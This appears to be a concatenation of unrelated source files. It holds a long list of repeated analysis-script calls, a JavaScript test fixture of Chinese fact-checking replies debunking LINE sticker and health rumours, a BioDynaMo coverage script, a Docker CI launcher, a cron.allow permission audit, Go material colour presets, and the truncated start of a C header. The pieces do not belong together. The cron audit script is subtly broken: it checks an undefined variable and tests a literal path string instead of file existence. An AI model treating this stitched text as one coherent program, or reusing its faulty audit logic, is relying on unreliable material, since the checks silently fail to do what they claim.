sh analyze_simple_1624.sh 1624A/7 1624A/18
sh analyze_simple_1624.sh 1624A/7 1624A/19
sh analyze_simple_1624.sh 1624A/7 1624A/20
sh analyze_simple_1624.sh 1624A/7 1624A/21
sh analyze_simple_1624.sh 1624A/7 1624A/22
sh analyze_simple_1624.sh 1624A/7 1624A/23
sh analyze_simple_1624.sh 1624A/8 1624A/1
sh analyze_simple_1624.sh 1624A/8 1624A/2
sh analyze_simple_1624.sh 1624A/8 1624A/3
sh analyze_simple_1624.sh 1624A/8 1624A/4
sh analyze_simple_1624.sh 1624A/8 1624A/5
sh analyze_simple_1624.sh 1624A/8 1624A/6
sh analyze_simple_1624.sh 1624A/8 1624A/7
sh analyze_simple_1624.sh 1624A/8 1624A/9
sh analyze_simple_1624.sh 1624A/8 1624A/10
sh analyze_simple_1624.sh 1624A/8 1624A/11
sh analyze_simple_1624.sh 1624A/8 1624A/12
sh analyze_simple_1624.sh 1624A/8 1624A/13
sh analyze_simple_1624.sh 1624A/8 1624A/14
sh analyze_simple_1624.sh 1624A/8 1624A/15
sh analyze_simple_1624.sh 1624A/8 1624A/16
sh analyze_simple_1624.sh 1624A/8 1624A/17
sh analyze_simple_1624.sh 1624A/8 1624A/18
sh analyze_simple_1624.sh 1624A/8 1624A/19
sh analyze_simple_1624.sh 1624A/8 1624A/20
sh analyze_simple_1624.sh 1624A/8 1624A/21
sh analyze_simple_1624.sh 1624A/8 1624A/22
sh analyze_simple_1624.sh 1624A/8 1624A/23
sh analyze_simple_1624.sh 1624A/9 1624A/1
sh analyze_simple_1624.sh 1624A/9 1624A/2
sh analyze_simple_1624.sh 1624A/9 1624A/3
sh analyze_simple_1624.sh 1624A/9 1624A/4
sh analyze_simple_1624.sh 1624A/9 1624A/5
sh analyze_simple_1624.sh 1624A/9 1624A/6
sh analyze_simple_1624.sh 1624A/9 1624A/7
sh analyze_simple_1624.sh 1624A/9 1624A/8
sh analyze_simple_1624.sh 1624A/9 1624A/10
sh analyze_simple_1624.sh 1624A/9 1624A/11
sh analyze_simple_1624.sh 1624A/9 1624A/12
sh analyze_simple_1624.sh 1624A/9 1624A/13
sh analyze_simple_1624.sh 1624A/9 1624A/14
sh analyze_simple_1624.sh 1624A/9 1624A/15
sh analyze_simple_1624.sh 1624A/9 1624A/16
sh analyze_simple_1624.sh 1624A/9 1624A/17
sh analyze_simple_1624.sh 1624A/9 1624A/18
sh analyze_simple_1624.sh 1624A/9 1624A/19
sh analyze_simple_1624.sh 1624A/9 1624A/20
sh analyze_simple_1624.sh 1624A/9 1624A/21
sh analyze_simple_1624.sh 1624A/9 1624A/22
sh analyze_simple_1624.sh 1624A/9 1624A/23
sh analyze_simple_1624.sh 1624A/10 1624A/1
sh analyze_simple_1624.sh 1624A/10 1624A/2
sh analyze_simple_1624.sh 1624A/10 1624A/3
sh analyze_simple_1624.sh 1624A/10 1624A/4
sh analyze_simple_1624.sh 1624A/10 1624A/5
sh analyze_simple_1624.sh 1624A/10 1624A/6
sh analyze_simple_1624.sh 1624A/10 1624A/7
sh analyze_simple_1624.sh 1624A/10 1624A/8
sh analyze_simple_1624.sh 1624A/10 1624A/9
sh analyze_simple_1624.sh 1624A/10 1624A/11
sh analyze_simple_1624.sh 1624A/10 1624A/12
sh analyze_simple_1624.sh 1624A/10 1624A/13
sh analyze_simple_1624.sh 1624A/10 1624A/14
sh analyze_simple_1624.sh 1624A/10 1624A/15
sh analyze_simple_1624.sh 1624A/10 1624A/16
sh analyze_simple_1624.sh 1624A/10 1624A/17
sh analyze_simple_1624.sh 1624A/10 1624A/18
sh analyze_simple_1624.sh 1624A/10 1624A/19
sh analyze_simple_1624.sh 1624A/10 1624A/20
sh analyze_simple_1624.sh 1624A/10 1624A/21
sh analyze_simple_1624.sh 1624A/10 1624A/22
sh analyze_simple_1624.sh 1624A/10 1624A/23
sh analyze_simple_1624.sh 1624A/11 1624A/1
sh analyze_simple_1624.sh 1624A/11 1624A/2
sh analyze_simple_1624.sh 1624A/11 1624A/3
sh analyze_simple_1624.sh 1624A/11 1624A/4
sh analyze_simple_1624.sh 1624A/11 1624A/5
sh analyze_simple_1624.sh 1624A/11 1624A/6
sh analyze_simple_1624.sh 1624A/11 1624A/7
sh analyze_simple_1624.sh 1624A/11 1624A/8
sh analyze_simple_1624.sh 1624A/11 1624A/9
sh analyze_simple_1624.sh 1624A/11 1624A/10
sh analyze_simple_1624.sh 1624A/11 1624A/12
sh analyze_simple_1624.sh 1624A/11 1624A/13
sh analyze_simple_1624.sh 1624A/11 1624A/14
sh analyze_simple_1624.sh 1624A/11 1624A/15
sh analyze_simple_1624.sh 1624A/11 1624A/16
sh analyze_simple_1624.sh 1624A/11 1624A/17
sh analyze_simple_1624.sh 1624A/11 1624A/18
sh analyze_simple_1624.sh 1624A/11 1624A/19
sh analyze_simple_1624.sh 1624A/11 1624A/20
sh analyze_simple_1624.sh 1624A/11 1624A/21
sh analyze_simple_1624.sh 1624A/11 1624A/22
sh analyze_simple_1624.sh 1624A/11 1624A/23
sh analyze_simple_1624.sh 1624A/12 1624A/1
sh analyze_simple_1624.sh 1624A/12 1624A/2
sh analyze_simple_1624.sh 1624A/12 1624A/3
sh analyze_simple_1624.sh 1624A/12 1624A/4
sh analyze_simple_1624.sh 1624A/12 1624A/5
sh analyze_simple_1624.sh 1624A/12 1624A/6
sh analyze_simple_1624.sh 1624A/12 1624A/7
sh analyze_simple_1624.sh 1624A/12 1624A/8
sh analyze_simple_1624.sh 1624A/12 1624A/9
sh analyze_simple_1624.sh 1624A/12 1624A/10
sh analyze_simple_1624.sh 1624A/12 1624A/11
sh analyze_simple_1624.sh 1624A/12 1624A/13
sh analyze_simple_1624.sh 1624A/12 1624A/14
sh analyze_simple_1624.sh 1624A/12 1624A/15
sh analyze_simple_1624.sh 1624A/12 1624A/16
sh analyze_simple_1624.sh 1624A/12 1624A/17
sh analyze_simple_1624.sh 1624A/12 1624A/18
sh analyze_simple_1624.sh 1624A/12 1624A/19
sh analyze_simple_1624.sh 1624A/12 1624A/20
sh analyze_simple_1624.sh 1624A/12 1624A/21
sh analyze_simple_1624.sh 1624A/12 1624A/22
sh analyze_simple_1624.sh 1624A/12 1624A/23
sh analyze_simple_1624.sh 1624A/13 1624A/1
sh analyze_simple_1624.sh 1624A/13 1624A/2
sh analyze_simple_1624.sh 1624A/13 1624A/3
sh analyze_simple_1624.sh 1624A/13 1624A/4
sh analyze_simple_1624.sh 1624A/13 1624A/5
sh analyze_simple_1624.sh 1624A/13 1624A/6
sh analyze_simple_1624.sh 1624A/13 1624A/7
sh analyze_simple_1624.sh 1624A/13 1624A/8
sh analyze_simple_1624.sh 1624A/13 1624A/9
sh analyze_simple_1624.sh 1624A/13 1624A/10
sh analyze_simple_1624.sh 1624A/13 1624A/11
sh analyze_simple_1624.sh 1624A/13 1624A/12
sh analyze_simple_1624.sh 1624A/13 1624A/14
sh analyze_simple_1624.sh 1624A/13 1624A/15
sh analyze_simple_1624.sh 1624A/13 1624A/16
sh analyze_simple_1624.sh 1624A/13 1624A/17
sh analyze_simple_1624.sh 1624A/13 1624A/18
sh analyze_simple_1624.sh 1624A/13 1624A/19
sh analyze_simple_1624.sh 1624A/13 1624A/20
sh analyze_simple_1624.sh 1624A/13 1624A/21
sh analyze_simple_1624.sh 1624A/13 1624A/22
sh analyze_simple_1624.sh 1624A/13 1624A/23
sh analyze_simple_1624.sh 1624A/14 1624A/1
sh analyze_simple_1624.sh 1624A/14 1624A/2
sh analyze_simple_1624.sh 1624A/14 1624A/3
sh analyze_simple_1624.sh 1624A/14 1624A/4
sh analyze_simple_1624.sh 1624A/14 1624A/5
sh analyze_simple_1624.sh 1624A/14 1624A/6
sh analyze_simple_1624.sh 1624A/14 1624A/7
sh analyze_simple_1624.sh 1624A/14 1624A/8
sh analyze_simple_1624.sh 1624A/14 1624A/9
sh analyze_simple_1624.sh 1624A/14 1624A/10
sh analyze_simple_1624.sh 1624A/14 1624A/11
sh analyze_simple_1624.sh 1624A/14 1624A/12
sh analyze_simple_1624.sh 1624A/14 1624A/13
sh analyze_simple_1624.sh 1624A/14 1624A/15
sh analyze_simple_1624.sh 1624A/14 1624A/16
sh analyze_simple_1624.sh 1624A/14 1624A/17
sh analyze_simple_1624.sh 1624A/14 1624A/18
sh analyze_simple_1624.sh 1624A/14 1624A/19
sh analyze_simple_1624.sh 1624A/14 1624A/20
sh analyze_simple_1624.sh 1624A/14 1624A/21
sh analyze_simple_1624.sh 1624A/14 1624A/22
sh analyze_simple_1624.sh 1624A/14 1624A/23
sh analyze_simple_1624.sh 1624A/15 1624A/1
sh analyze_simple_1624.sh 1624A/15 1624A/2
sh analyze_simple_1624.sh 1624A/15 1624A/3
sh analyze_simple_1624.sh 1624A/15 1624A/4
sh analyze_simple_1624.sh 1624A/15 1624A/5
sh analyze_simple_1624.sh 1624A/15 1624A/6
sh analyze_simple_1624.sh 1624A/15 1624A/7
sh analyze_simple_1624.sh 1624A/15 1624A/8
sh analyze_simple_1624.sh 1624A/15 1624A/9
sh analyze_simple_1624.sh 1624A/15 1624A/10
sh analyze_simple_1624.sh 1624A/15 1624A/11
sh analyze_simple_1624.sh 1624A/15 1624A/12
sh analyze_simple_1624.sh 1624A/15 1624A/13
sh analyze_simple_1624.sh 1624A/15 1624A/14
sh analyze_simple_1624.sh 1624A/15 1624A/16
sh analyze_simple_1624.sh 1624A/15 1624A/17
sh analyze_simple_1624.sh 1624A/15 1624A/18
sh analyze_simple_1624.sh 1624A/15 1624A/19
sh analyze_simple_1624.sh 1624A/15 1624A/20
sh analyze_simple_1624.sh 1624A/15 1624A/21
sh analyze_simple_1624.sh 1624A/15 1624A/22
sh analyze_simple_1624.sh 1624A/15 1624A/23
sh analyze_simple_1624.sh 1624A/16 1624A/1
sh analyze_simple_1624.sh 1624A/16 1624A/2
sh analyze_simple_1624.sh 1624A/16 1624A/3
sh analyze_simple_1624.sh 1624A/16 1624A/4
sh analyze_simple_1624.sh 1624A/16 1624A/5
sh analyze_simple_1624.sh 1624A/16 1624A/6
sh analyze_simple_1624.sh 1624A/16 1624A/7
sh analyze_simple_1624.sh 1624A/16 1624A/8
sh analyze_simple_1624.sh 1624A/16 1624A/9
sh analyze_simple_1624.sh 1624A/16 1624A/10
sh analyze_simple_1624.sh 1624A/16 1624A/11
sh analyze_simple_1624.sh 1624A/16 1624A/12
sh analyze_simple_1624.sh 1624A/16 1624A/13
sh analyze_simple_1624.sh 1624A/16 1624A/14
sh analyze_simple_1624.sh 1624A/16 1624A/15
sh analyze_simple_1624.sh 1624A/16 1624A/17
sh analyze_simple_1624.sh 1624A/16 1624A/18
sh analyze_simple_1624.sh 1624A/16 1624A/19
sh analyze_simple_1624.sh 1624A/16 1624A/20
sh analyze_simple_1624.sh 1624A/16 1624A/21
sh analyze_simple_1624.sh 1624A/16 1624A/22
sh analyze_simple_1624.sh 1624A/16 1624A/23
sh analyze_simple_1624.sh 1624A/17 1624A/1
sh analyze_simple_1624.sh 1624A/17 1624A/2
sh analyze_simple_1624.sh 1624A/17 1624A/3
sh analyze_simple_1624.sh 1624A/17 1624A/4
sh analyze_simple_1624.sh 1624A/17 1624A/5
sh analyze_simple_1624.sh 1624A/17 1624A/6
sh analyze_simple_1624.sh 1624A/17 1624A/7
sh analyze_simple_1624.sh 1624A/17 1624A/8
sh analyze_simple_1624.sh 1624A/17 1624A/9
sh analyze_simple_1624.sh 1624A/17 1624A/10
sh analyze_simple_1624.sh 1624A/17 1624A/11
sh analyze_simple_1624.sh 1624A/17 1624A/12
sh analyze_simple_1624.sh 1624A/17 1624A/13
sh analyze_simple_1624.sh 1624A/17 1624A/14
sh analyze_simple_1624.sh 1624A/17 1624A/15
sh analyze_simple_1624.sh 1624A/17 1624A/16
sh analyze_simple_1624.sh 1624A/17 1624A/18
sh analyze_simple_1624.sh 1624A/17 1624A/19
sh analyze_simple_1624.sh 1624A/17 1624A/20
sh analyze_simple_1624.sh 1624A/17 1624A/21
sh analyze_simple_1624.sh 1624A/17 1624A/22
sh analyze_simple_1624.sh 1624A/17 1624A/23
sh analyze_simple_1624.sh 1624A/18 1624A/1
sh analyze_simple_1624.sh 1624A/18 1624A/2
sh analyze_simple_1624.sh 1624A/18 1624A/3
sh analyze_simple_1624.sh 1624A/18 1624A/4
sh analyze_simple_1624.sh 1624A/18 1624A/5
sh analyze_simple_1624.sh 1624A/18 1624A/6
sh analyze_simple_1624.sh 1624A/18 1624A/7
sh analyze_simple_1624.sh 1624A/18 1624A/8
sh analyze_simple_1624.sh 1624A/18 1624A/9
sh analyze_simple_1624.sh 1624A/18 1624A/10
sh analyze_simple_1624.sh 1624A/18 1624A/11
sh analyze_simple_1624.sh 1624A/18 1624A/12
sh analyze_simple_1624.sh 1624A/18 1624A/13
sh analyze_simple_1624.sh 1624A/18 1624A/14
sh analyze_simple_1624.sh 1624A/18 1624A/15
sh analyze_simple_1624.sh 1624A/18 1624A/16
sh analyze_simple_1624.sh 1624A/18 1624A/17
sh analyze_simple_1624.sh 1624A/18 1624A/19
sh analyze_simple_1624.sh 1624A/18 1624A/20
sh analyze_simple_1624.sh 1624A/18 1624A/21
sh analyze_simple_1624.sh 1624A/18 1624A/22
sh analyze_simple_1624.sh 1624A/18 1624A/23
sh analyze_simple_1624.sh 1624A/19 1624A/1
sh analyze_simple_1624.sh 1624A/19 1624A/2
sh analyze_simple_1624.sh 1624A/19 1624A/3
sh analyze_simple_1624.sh 1624A/19 1624A/4
sh analyze_simple_1624.sh 1624A/19 1624A/5
sh analyze_simple_1624.sh 1624A/19 1624A/6
sh analyze_simple_1624.sh 1624A/19 1624A/7
sh analyze_simple_1624.sh 1624A/19 1624A/8
sh analyze_simple_1624.sh 1624A/19 1624A/9
sh analyze_simple_1624.sh 1624A/19 1624A/10
sh analyze_simple_1624.sh 1624A/19 1624A/11
sh analyze_simple_1624.sh 1624A/19 1624A/12
sh analyze_simple_1624.sh 1624A/19 1624A/13
sh analyze_simple_1624.sh 1624A/19 1624A/14
sh analyze_simple_1624.sh 1624A/19 1624A/15
sh analyze_simple_1624.sh 1624A/19 1624A/16
sh analyze_simple_1624.sh 1624A/19 1624A/17
sh analyze_simple_1624.sh 1624A/19 1624A/18
sh analyze_simple_1624.sh 1624A/19 1624A/20
sh analyze_simple_1624.sh 1624A/19 1624A/21
sh analyze_simple_1624.sh 1624A/19 1624A/22
sh analyze_simple_1624.sh 1624A/19 1624A/23
sh analyze_simple_1624.sh 1624A/20 1624A/1
sh analyze_simple_1624.sh 1624A/20 1624A/2
sh analyze_simple_1624.sh 1624A/20 1624A/3
sh analyze_simple_1624.sh 1624A/20 1624A/4
sh analyze_simple_1624.sh 1624A/20 1624A/5
sh analyze_simple_1624.sh 1624A/20 1624A/6
sh analyze_simple_1624.sh 1624A/20 1624A/7
sh analyze_simple_1624.sh 1624A/20 1624A/8
sh analyze_simple_1624.sh 1624A/20 1624A/9
sh analyze_simple_1624.sh 1624A/20 1624A/10
sh analyze_simple_1624.sh 1624A/20 1624A/11
sh analyze_simple_1624.sh 1624A/20 1624A/12
sh analyze_simple_1624.sh 1624A/20 1624A/13
sh analyze_simple_1624.sh 1624A/20 1624A/14
sh analyze_simple_1624.sh 1624A/20 1624A/15
sh analyze_simple_1624.sh 1624A/20 1624A/16
sh analyze_simple_1624.sh 1624A/20 1624A/17
sh analyze_simple_1624.sh 1624A/20 1624A/18
sh analyze_simple_1624.sh 1624A/20 1624A/19
sh analyze_simple_1624.sh 1624A/20 1624A/21
sh analyze_simple_1624.sh 1624A/20 1624A/22
sh analyze_simple_1624.sh 1624A/20 1624A/23
sh analyze_simple_1624.sh 1624A/21 1624A/1
sh analyze_simple_1624.sh 1624A/21 1624A/2
sh analyze_simple_1624.sh 1624A/21 1624A/3
sh analyze_simple_1624.sh 1624A/21 1624A/4
sh analyze_simple_1624.sh 1624A/21 1624A/5
sh analyze_simple_1624.sh 1624A/21 1624A/6
sh analyze_simple_1624.sh 1624A/21 1624A/7
sh analyze_simple_1624.sh 1624A/21 1624A/8
sh analyze_simple_1624.sh 1624A/21 1624A/9
sh analyze_simple_1624.sh 1624A/21 1624A/10
sh analyze_simple_1624.sh 1624A/21 1624A/11
sh analyze_simple_1624.sh 1624A/21 1624A/12
sh analyze_simple_1624.sh 1624A/21 1624A/13
sh analyze_simple_1624.sh 1624A/21 1624A/14
sh analyze_simple_1624.sh 1624A/21 1624A/15
sh analyze_simple_1624.sh 1624A/21 1624A/16
sh analyze_simple_1624.sh 1624A/21 1624A/17
sh analyze_simple_1624.sh 1624A/21 1624A/18
sh analyze_simple_1624.sh 1624A/21 1624A/19
sh analyze_simple_1624.sh 1624A/21 1624A/20
sh analyze_simple_1624.sh 1624A/21 1624A/22
sh analyze_simple_1624.sh 1624A/21 1624A/23
sh analyze_simple_1624.sh 1624A/22 1624A/1
sh analyze_simple_1624.sh 1624A/22 1624A/2
sh analyze_simple_1624.sh 1624A/22 1624A/3
sh analyze_simple_1624.sh 1624A/22 1624A/4
sh analyze_simple_1624.sh 1624A/22 1624A/5
sh analyze_simple_1624.sh 1624A/22 1624A/6
sh analyze_simple_1624.sh 1624A/22 1624A/7
sh analyze_simple_1624.sh 1624A/22 1624A/8
sh analyze_simple_1624.sh 1624A/22 1624A/9
sh analyze_simple_1624.sh 1624A/22 1624A/10
sh analyze_simple_1624.sh 1624A/22 1624A/11
sh analyze_simple_1624.sh 1624A/22 1624A/12
sh analyze_simple_1624.sh 1624A/22 1624A/13
sh analyze_simple_1624.sh 1624A/22 1624A/14
sh analyze_simple_1624.sh 1624A/22 1624A/15
sh analyze_simple_1624.sh 1624A/22 1624A/16
sh analyze_simple_1624.sh 1624A/22 1624A/17
sh analyze_simple_1624.sh 1624A/22 1624A/18
sh analyze_simple_1624.sh 1624A/22 1624A/19
sh analyze_simple_1624.sh 1624A/22 1624A/20
sh analyze_simple_1624.sh 1624A/22 1624A/21
sh analyze_simple_1624.sh 1624A/22 1624A/23
sh analyze_simple_1624.sh 1624A/23 1624A/1
sh analyze_simple_1624.sh 1624A/23 1624A/2
sh analyze_simple_1624.sh 1624A/23 1624A/3
sh analyze_simple_1624.sh 1624A/23 1624A/4
sh analyze_simple_1624.sh 1624A/23 1624A/5
sh analyze_simple_1624.sh 1624A/23 1624A/6
sh analyze_simple_1624.sh 1624A/23 1624A/7
sh analyze_simple_1624.sh 1624A/23 1624A/8
sh analyze_simple_1624.sh 1624A/23 1624A/9
sh analyze_simple_1624.sh 1624A/23 1624A/10
sh analyze_simple_1624.sh 1624A/23 1624A/11
sh analyze_simple_1624.sh 1624A/23 1624A/12
sh analyze_simple_1624.sh 1624A/23 1624A/13
sh analyze_simple_1624.sh 1624A/23 1624A/14
sh analyze_simple_1624.sh 1624A/23 1624A/15
sh analyze_simple_1624.sh 1624A/23 1624A/16
sh analyze_simple_1624.sh 1624A/23 1624A/17
sh analyze_simple_1624.sh 1624A/23 1624A/18
sh analyze_simple_1624.sh 1624A/23 1624A/19
sh analyze_simple_1624.sh 1624A/23 1624A/20
sh analyze_simple_1624.sh 1624A/23 1624A/21
sh analyze_simple_1624.sh 1624A/23 1624A/22
|
import { fromJS } from 'immutable';
export const setStateAction = {
type: 'articleDetail/SET_STATE',
payload: {
key: 'isLoading',
value: true,
},
};
export const loadAction = {
type: 'articleDetail/LOAD',
payload: fromJS({
replyCount: 1,
relatedArticles: {
edges: [
{
node: {
id: 'article1',
replyConnections: [
{
articleId: 'article1',
replyId: 'relatedReply1',
canUpdateStatus: false,
reply: {
id: 'relatedReply1',
type: 'RUMOR',
text: '醫師聽聞後都斥為無稽之談',
createdAt: '2017-10-29T03:19:56.782Z',
},
createdAt: '2017-11-15T08:08:08.782Z',
},
{
articleId: 'article1',
replyId: 'relatedReply2',
canUpdateStatus: false,
reply: {
id: 'relatedReply2',
type: 'RUMOR',
text: '喝冰水跟罹癌根本是兩回事',
createdAt: '2017-10-30T05:34:56.782Z',
},
createdAt: '2017-11-17T20:21:56.309Z',
},
{
articleId: 'article1',
replyId: 'reply1',
canUpdateStatus: false,
reply: {
id: 'reply1', // Already added to article (exists in replyConnections)
type: 'NOT_ARTICLE',
text:
'文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
createdAt: '2017-08-30T08:09:10.111Z',
},
createdAt: '2017-10-29T03:19:56.782Z',
},
],
},
score: 3.4705038,
},
{
node: {
id: 'article2',
text: '~~黎建南給退休軍公教人員的一封公開信~~',
replyConnections: [
{
articleId: 'article2',
replyId: 'relatedReply1',
canUpdateStatus: false,
reply: {
// This is duplicated with related article 1
id: 'relatedReply1',
type: 'RUMOR',
text: '醫師聽聞後都斥為無稽之談',
createdAt: '2017-10-29T03:19:56.782Z',
},
createdAt: '2017-10-30T12:19:00.335Z',
},
],
},
},
],
},
replyRequestCount: 1,
replyConnections: [
{
articleId: 'article1',
replyId: 'reply1',
canUpdateStatus: true,
status: 'NORMAL',
reply: {
id: 'reply1',
type: 'NOT_ARTICLE',
text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
createdAt: '2017-08-30T08:09:10.111Z',
},
feedbacks: [],
user: {
id: 'AVqVwjqQyrDaTqlmmp_a',
name: null,
avatarUrl: null,
},
createdAt: '2017-10-29T03:19:56.782Z',
},
],
user: null,
text: '請問這偏文章是正確嗎?',
id: 'AV9mEFX2yCdS-nWhuiPu',
createdAt: '2017-10-29T02:57:47.509Z',
}),
};
export const reloadRepliesAction = {
type: 'articleDetail/LOAD',
payload: fromJS({
replyConnections: [
{
id: 'reply1',
canUpdateStatus: true,
status: 'NORMAL',
reply: {
id: 'AV9mN3dDyCdS-nWhuiP3',
user: {
id: 'AVqVwjqQyrDaTqlmmp_a',
name: null,
avatarUrl: null,
},
type: 'NOT_ARTICLE',
text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
reference: '',
createdAt: '2017-10-29T03:40:31.938Z',
},
feedbacks: [],
user: {
id: 'AVqVwjqQyrDaTqlmmp_a',
name: null,
avatarUrl: null,
},
createdAt: '2017-10-29T03:40:31.942Z',
},
{
id: 'reply2',
canUpdateStatus: true,
status: 'NORMAL',
reply: {
id: 'AV9mJJ5qyCdS-nWhuiPz',
user: {
id: 'AVqVwjqQyrDaTqlmmp_a',
name: null,
avatarUrl: null,
},
type: 'NOT_ARTICLE',
text: '文字長度太短,疑似為使用者手動輸入之查詢語句,不像轉傳文章。',
reference: '',
createdAt: '2017-10-29T03:19:56.776Z',
},
feedbacks: [],
user: {
id: 'AVqVwjqQyrDaTqlmmp_a',
name: null,
avatarUrl: null,
},
createdAt: '2017-10-29T03:19:56.782Z',
},
],
}),
};
export const loadAuthAction = {
type: 'articleDetail/LOAD_AUTH',
payload: fromJS({
replyConnections: [
{
articleId: 'AV9mEFX2yCdS-nWhuiPu',
replyId: 'AV9mJJ5qyCdS-nWhuiPz',
canUpdateStatus: true,
},
],
}),
};
export const searchRepliesAction = {
type: 'articleDetail/LOAD_SEARCH_OF_REPLIES',
payload: fromJS([
{
cursor: 'WzcuMDk5MzIsImRvYyNBV0Z3WGVpVG<KEY>',
node: {
id: 'AWFwXeiThutQxxU6trWM',
text:
'打開「台北捷運GO」 APP,選取首頁上方熊讚專屬橫幅(banner),連結至「貼圖下載」頁面,即可免費使用可愛的熊讚心情貼圖。貼圖下載活動期間為即日起至3月7日,貼圖則可使用到107年8月6日。\n',
type: 'NOT_RUMOR',
createdAt: '2018-02-07T13:04:18.065Z',
replyConnections: [
{
article: {
id: 'AWFwXCyvhutQxxU6trWK',
text:
'上面 這隻熊點他可以下載是隱藏版新圖\n如不能下載點以下連結\nline://ch/1454987169/coupon/sticker/grant\n台北捷運伴你同行\n是真的!\n( 隱藏版的免付費貼圖 )',
},
},
],
},
},
{
cursor: 'WzcuMDk5MzIsImRvYyNBV0Z1M3ZuV2h1dFF4eFU2dHJTeiJd',
node: {
id: 'AWFu3vnWhutQxxU6trSz',
text:
'台北捷運公司確實有發行此款貼圖。貼圖下載活動期間為即日起至3月7日,貼圖則可使用到107年8月6日。\n\n該連結直接導向至貼圖下載頁面,應不需加入任何可疑廣告群組。',
type: 'NOT_RUMOR',
createdAt: '2018-02-07T06:06:02.197Z',
replyConnections: [
{
article: {
id: 'AWFu2p62hutQxxU6trSv',
text:
'請下載台北捷運公司貼圖\n\nline://ch/1454987169/coupon/sticker/grant',
},
},
{
article: {
id: 'AWFvYRb3hutQxxU6trUF',
text:
'免費下載貼圖\n\n台北捷運伴你同行\nline://ch/1454987169/coupon/sticker/grant\n\n這是真的哦!',
},
},
],
},
},
]),
};
export const searchRepiedArticleAction = {
type: 'articleDetail/LOAD_SEARCH_OF_ARTICLES',
payload: fromJS([
{
node: {
id: 'AV0_zZZeyCdS-nWhucSq',
text:
'限時免費貼圖大放送!\n\n只要在期限7/11~7/26前將本訊息轉傳至10個聊天室,就可獲得貼圖一款(貓貓蟲-咖波 懶惰生活)呦!\n\n(轉傳完成以後請重新開啟你的Line,點擊以下連結下載貼圖)\n\n「貓貓蟲-咖波 懶惰生活」\nhttps://line.me/S/sticker/8358',
replyCount: 2,
createdAt: '2017-07-14T06:33:44.284Z',
replyConnections: [
{
reply: {
id: 'AV1S6y1XyCdS-nWhucgX',
text: '或許是另一種廣告的方式',
createdAt: '2017-07-17T23:38:50.582Z',
type: 'NOT_ARTICLE',
},
},
{
reply: {
id: 'AV1AZJvIyCdS-nWhucTA',
text:
'在不知情使用者會把訊息傳到幾個聊天室的狀況下,當然LINE也就不可能藉由這樣的方式贈送貼圖。不管轉發10個聊天室還是100個聊天室,都不會有免費貼圖可以拿。也不會因為按了連結而發生個資被盜用的狀況。',
createdAt: '2017-07-14T09:18:41.607Z',
type: 'RUMOR',
},
},
],
},
},
{
node: {
id: '5481225302468-rumor',
text:
'TOTAL道達爾潤滑油所推出的企業贊助貼圖,隱含惡意程式,下載或使用此貼圖會被群翻。',
replyCount: 2,
createdAt: '2017-01-10T08:47:00.000Z',
replyConnections: [
{
reply: {
id: '5428664755205-answer',
text:
'貼圖不會隱藏惡意程式。\n\nLINE 官方貼文將此則留言作為謠言的例子,呼籲大家切勿相信。Total 官方粉絲頁亦有澄清。',
createdAt: '2016-12-30T16:35:00.000Z',
type: 'RUMOR',
},
},
{
reply: {
id: 'AV8WL1dfyCdS-nWhuhYV',
text:
'道達爾潤滑油與LINE,共同發表官方聲明:\n『一切為不實謠言,請網友勿信』,LINE相關訊息以官方公告為準。\n通訊軟體上,惡意散播下載道達爾QUARTZ機器人貼圖隱含"惡意程式",下載或使用此貼圖會被群翻之謠言,是不實消息。',
createdAt: '2017-10-13T14:42:02.206Z',
type: 'RUMOR',
},
},
],
},
},
]),
};
|
#!/bin/bash
# -----------------------------------------------------------------------------
#
# Copyright (C) 2021 CERN & University of Surrey for the benefit of the
# BioDynaMo collaboration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# See the LICENSE file distributed with this work for details.
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# -----------------------------------------------------------------------------
# Creates coverage report in separate directory `coverage`
# Arguments:
# $1 - Path to the project root directory
# $2 - Path to the current build directory
PROJECT_ROOT_DIR=$1
BUILD_DIR=$2
set -x
pushd $BUILD_DIR
mkdir coverage 2>/dev/null
cd coverage
cmake -Dcoverage=on $PROJECT_ROOT_DIR >/dev/null
cmake --build . --target all >/dev/null
set +x
. bin/thisbdm.sh ""
set -x
cmake --build . --target coverage >/dev/null
popd
|
#!/bin/sh -xe
# Run tests in Container
sudo docker run --privileged -v `pwd`:/SCAMP:rw -it fedora:$1 /bin/bash -c "bash -xe /SCAMP/travis/fedora_build_inside_docker.sh $1"
|
#!/usr/bin/env bash
res=0
if [ -f /etc/cron.allow ];then
fileperm=`/bin/ls -ld ${file} | cut -f1 -d" "`
if [ `echo ${fileperm} | cut -c2 ` != "r" ];then
echo "User Read NOT set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c3 ` != "w" ];then
echo "User Write NOT set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c4 ` == "x" ];then
echo "User Execute set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c5 ` != "-" ];then
echo "Group Read set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c6 ` != "-" ];then
echo "Group Write set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c7 ` != "-" ];then
echo "Group Execute set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c8 ` != "-" ];then
echo "Other Read set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c9 ` != "-" ];then
echo "Other Write set on $file"
res=1
fi
if [ `echo ${fileperm} | cut -c10 ` != "-" ];then
echo "Other Execute set on $file"
res=1
fi
else
if [ -z /etc/cron.deny ];then
echo "/etc/cron.allow do not exist AND /etc/cron.deny do not exist !"
res=1
fi
fi
if [ ${res} -ne 0 ];then
exit 1
fi
|
<gh_stars>0
package material
import "github.com/rrothenb/pbr/pkg/rgb"
// https://i.stack.imgur.com/Q73nz.png
func Gold(roughness, metalness float64) *Uniform {
return &Uniform{
Color: rgb.Energy{1, 0.86, 0.57},
Metalness: metalness,
Roughness: roughness,
}
}
func Mirror(roughness float64) *Uniform {
return &Uniform{
Color: rgb.Energy{0.8, 0.8, 0.8},
Metalness: 1,
Roughness: roughness,
}
}
func Copper(roughness, metalness float64) *Uniform {
return &Uniform{
Color: rgb.Energy{0.98, 0.82, 0.76},
Metalness: metalness,
Roughness: roughness,
}
}
|
<gh_stars>1-10
#ifndef _LOGGER_H_
#define _LOGGER_H_
#if defined(_MSC_VER)
#pragma once
#endif
/*
* LEGAL NOTICE
